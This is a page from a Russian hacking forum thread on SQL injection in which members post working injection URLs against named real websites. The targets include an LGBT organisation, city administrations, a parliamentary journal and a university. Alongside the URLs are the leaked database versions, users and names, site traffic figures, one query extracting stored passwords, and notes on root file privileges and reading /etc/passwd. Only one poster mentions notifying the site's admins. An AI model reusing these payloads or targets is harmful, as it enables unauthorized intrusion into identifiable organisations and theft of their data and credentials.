SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Санкт-Петербургская ЛГБТ Организация «Выход»
    Code:
    http://comingoutspb.com/ru/materialyi-po-proektu?project=1+and+updatexml(1,concat(0x3a,(select concat(version(),0x3a,database()))),1)
    XPATH syntax error: ':5.5.41-0+wheezy1:comingun_db1'
     
  2. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.kanda.com/readnews.php?id=-17+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10--
    5.5.30:[email protected]:kanda_kandadb
     
  3. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    [​IMG]
    Code:
    http://plugring.farmanager.com/author.php?aid=-9+union+select+1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14--
    plugring@localhost:plugring:5.5.41-0ubuntu0.14.04.1

    Админы оповещены.
     
  4. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Баянчик ;)
    Пруфлинк https://forum.antichat.ru/showpost.php?p=2483739&postcount=13493
    Но оставим, другой сценарий.
     
  5. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://actachemscand.dk/author.php?aid=-1126+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4--
    5.1.63-0ubuntu0.11.04.1:acta@localhost:acta 4
     
  6. palec2006

    palec2006 Banned

    Joined:
    30 Oct 2012
    Messages:
    38
    Likes Received:
    33
    Reputations:
    8
    Тотализатор

    ТИЦ:50
    ЯК
    кило трафа

    в браузере редиректит
     
  7. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.team221.com/order.php?cat=-3+union+select+concat_ws(0x3a,version(),user(),database())--
     
  8. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    [​IMG]
    Code:
    http://rockbay.ru/category/1?order_brend=1+and+extractvalue(1,concat(0x3a,(select+concat(version(),0x3a,database(),0x3a,user()))))-- 
    5.5.41-0ubuntu0.12.04.1:rockbay

    Официальный сайт администрации города Ноябрьск
    Code:
    http://admnoyabrsk.ru/onenews.php?kat=-2211+UNION+ALL+SELECT 1,CONCAT(version(),0x3a,database(),0x3a,user())--&news=389
    5.1.41-log:admnoyabrs_db:[email protected]

    Администрация городского округа — город Волжский
    Code:
    http://www.admvol.ru/TopNews/podrobno.asp?id=5'+or+1=@@version-- 
    Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
     
    #15908 MaxFast, 14 Feb 2015
    Last edited: 14 Feb 2015
  9. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    5.5.32-log:[email protected]
     
    _________________________
    1 person likes this.
  10. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    5.5.35-33.0
    u0967474_smart@localhost


    Ситауация схожа с с третьим видео

    и ещё одна

    под хексом /etc/passwd

    Смотрим тег title
     
    #15910 psihoz26, 15 Feb 2015
    Last edited by a moderator: 16 Feb 2015
    2 people like this.
  11. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Code:
    http://www.aaa-agro.com/news/536.html'*updatexml(1,concat(0x3A,version()),1)*'
    Вывод в алерте
    5.5.41-0ubuntu0.12.04
     
    _________________________
    erbolg, nemaniak and YaBtr like this.
  12. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    5.5.40-cll:fbcinver_user@localhost
    5.1.73-cll:federalp_segun@localhost
     
    _________________________
    #15912 grimnir, 17 Feb 2015
    Last edited: 17 Feb 2015
    1 person likes this.
  13. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    wwcc.edu PR-5
    Code:
    http://www.wwcc.edu/CMSX/main.php?module=department&collegecode=200&deptcode=ELEC' AND (SELECT 8494 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(concat_ws(0x3a,version(),user(),database()),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hDoK'='hDoK
    Code:
    5.1.73-log:[email protected]:catalog1

    giveawaytab.com 9k трафа
    Code:
    http://giveawaytab.com/giveaway2/mobile.php?pageid=-9199'+union+select+ NULL,NULL,NULL,version(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%23
    Code:
    5.1.73-log

    isnap.com 10k трафа
    Code:
    http://www.isnap.com/desktop/event.php?q=1&id=1-999.9+union+select+111,222,333,444,555,6666,@@version,888+--+
    Code:
    Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46 Copyright (c) Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.0 (Build 6002: Service Pack 2) (Hypervisor) 

    quotationspage.com PR-6 50k трафа
    Code:
    http://quotationspage.com/books.php3?category=-special'+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4+--+
    Code:
    5.0.95:quotes@localhost:quotes
     
    1 person likes this.
  14. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Code:
    http://www.aza.com.ua/servis/view1.html?id=-741+union+select+1,2,concat_ws(%27:%27,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user--+k
    root@localhost:5.5.17:test

    MQ off
    File_priv Y
     
    _________________________
  15. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    5.0.45-community-nt-log:p[email protected]
    PR6 987K траффа тИЦ 140

    вывод на странице qjbkq5.5.40-cll
    1.25M траффа
    berghahn_jb001@localhost3!P5.5.40-cll3!Pberghahn_berghahn!~!

    errorbased Duplicate entry '!~!5.1.68!~!1'
     
    _________________________
    #15915 grimnir, 19 Feb 2015
    Last edited: 20 Feb 2015
    1 person likes this.
  16. palec2006

    palec2006 Banned

    Joined:
    30 Oct 2012
    Messages:
    38
    Likes Received:
    33
    Reputations:
    8
    5.1.73
    ТИЦ:900
    PR:4
    Live Int:2750

    админка гдето у индийских кодеров потерялась
     
  17. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    "ОБЩЕСТВЕННО-ПОЛИТИЧЕСКИЙ ЖУРНАЛ ФЕДЕРАЛЬНОГО СОБРАНИЯ — ПАРЛАМЕНТА РФ"
    Code:
    http://www.russia-today.ru/index.php?idn=-359 union select 1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9-- 
    [email protected]:5.5.35-1+wheezy1+mh1-log:u260343_osn

    тИЦ: 1200
     
  18. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    Популярные очки для компьютера 590k траффа ,вывод ошибок в исходном коде страницы
    ERROR: $query. Duplicate entry '!~!admin13@localhost!~!1' for key 'group_key
    version:5.5.30
     
    _________________________
    #15918 grimnir, 24 Feb 2015
    Last edited: 24 Feb 2015
    2 people like this.
  19. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    [​IMG]
    Code:
    http://mplo48.ru/?module=news&id=-710' union select 1,2,3,4,5,6,7,8,concat(user(),0x3a,version(),0x3a,database()) --
    mplo48_root@localhost:5.1.73:mplo48_root

    КПРФ Томск
    Code:
    http://kprf.tomsk.ru/photos/-1713' union all select concat(user(),0x3a,version(),0x3a,database()) -- /
    [email protected]:5.0.92-log:kprfwww

    Вывод в meta name="description"

    [​IMG]
    Code:
    http://www.otvprim.ru/programs?id2=-304 union select 1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12--
    admin_otv@localhost:admin_otv:5.5.41-0+wheezy1-log
     
    #15919 MaxFast, 25 Feb 2015
    Last edited: 26 Feb 2015
    1 person likes this.
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.bu.edu/dbin/eng/announcements/view.php?id=-117+union+select+1,2,3,4,unhex(hex(cal_passwd)),6,7+from+webcal_user+limit+1,1
    4.1.14-standard-log
    ТИЦ 850 PR 7 ALEXA 4311
    найденные таблицы:
    Code:
     webcal_config                                                                                                                                                     
     webcal_entry_log                                                                                                                                                  
     webcal_site_extras                                                                                                                                                
     webcal_user                                                                                                                                                       
     certificates                                                                                                                                                      
     reviews                                                                                                                                                           
     webcal_report                                                                                                                                                     
     webcal_report_template                                                                                                                                            
     announcements                                                                                                                                                     
     seniors 
     
    _________________________
    2 people like this.
Thread Status:
Not open for further replies.